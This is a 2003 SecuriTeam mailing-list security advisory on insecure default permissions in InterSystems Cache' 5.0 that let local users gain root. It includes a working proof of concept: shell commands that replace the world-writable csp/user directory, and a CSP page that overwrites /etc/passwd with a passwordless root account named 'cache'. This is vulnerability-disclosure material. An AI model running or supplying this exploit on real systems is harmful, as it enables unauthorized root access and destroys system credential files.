[UNIX] Intersystems Cache' Database Two Local Root Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 08/24/03

  • Next message: SecuriTeam: "[NT] Buffer Overflow in UDP Broadcasts for Microsoft SQL Server Client Utilities"
    To: list@securiteam.com
    Date: 24 Aug 2003 17:27:39 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Intersystems Cache' Database Two Local Root Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.intersystems.com> Cache', the post-relational database for
    e-applications, is optimized for the tougher demands of Web applications.
    It delivers breakthrough performance for massively scalable Web
    applications. Its rapid application development environment with advanced
    object technology lets you operate at Internet speed. Cache's ultra-fast
    SQL outperforms relational systems 20X. And its multidimensional
    application and data server delivers lightning-fast performance."

    The default installation of the Cache database yields poorly protected
    files and directories in the main package tree. Directories and files are
    open to all users as read write and execute.

    DETAILS

    Vulnerable systems:
     * Cache' Database version 5.0

    Local attackers can exploit this to manipulate directories and binaries
    inside the installation tree. This may be used by a local malicious user
    to gain root access. The content in /cachesys/csp/user is executed as root
    through the web interface. user's parent directory (csp) is world
    writeable allowing a local non root user to move user aside, copy its
    contents and create a new writeable user directory.

    mv /cachesys/csp/user /cachesys/csp/user.old
    cp -rp /cachesys/csp/user /cachesys/csp/user.old
    cp cspexp.csp /cachesys/csp/user
    lnyx http://localhost/csp/user/cspexp.csp
    su - cache

    <------------------cspexp.csp------------->

    < html>

    Intersystems Cache' local root exploit. Larry W. Cashdollar
    http://vapid.dhs.org

    Because of poor default file and directory permissions a local user can
    execute code as root via the cache CSP interpreter. <HR>
    Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.

    < script language=Cache runat=server>

         Set cdef=##class(%Library.File).%New("/etc/passwd")
         Do cdef.Open("WSN")
         Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
         Do cdef.%Close()

    </script>

    </html>

    <------------------cspexp.csp------------->

    Vendor response:
    See <http://www.intersystems.com/support/flash/index.html>
    http://www.intersystems.com/support/flash/index.html for additional
    details.

    ADDITIONAL INFORMATION

    The original advisory can be downloaded from:
    <http://vapid.dhs.org/cache.html> http://vapid.dhs.org/cache.html.

    The information has been provided by Larry W. Cashdollar.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Buffer Overflow in UDP Broadcasts for Microsoft SQL Server Client Utilities"

    Relevant Pages

    • [UNIX] Rocks Clusters Local Root Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Rocks Clusters Local Root Vulnerabilities ... Rocks Clusters is vulnerable to local root privilege escalation due to ... systemexecution. ...
      (Securiteam)
    • [UNIX] Oracle Database Local Untrusted Library Path Vulnerability (Technical Details)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Oracle Database Local Untrusted Library Path Vulnerability (Technical ... allows a user in the OINSTALL/DBA group to scalate privileges to root. ...
      (Securiteam)
    • [UNIX] KPopup Allows Gaining of Elevated Privileges (Insecure system())
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... compiled and install the binary KPopup is installed setuid root it also ... especially on a setuid root binaries. ... To exploit this we need to do is make a shell script and call it killall, ...
      (Securiteam)
    • [UNIX] Sun Microsystems Solaris ld.so Directory Traversal Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Sun Microsystems Solaris ld.so Directory Traversal Vulnerability ... potentially allow a non root user to execute arbitrary code as root. ... This message file is meant to contain format strings used to build error ...
      (Securiteam)
    • [UNIX] bsdmainutils Local Root Compromise
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in its calendar program allows local users to gain root ... When called with the "-a" option, calendar will processes the event files ...
      (Securiteam)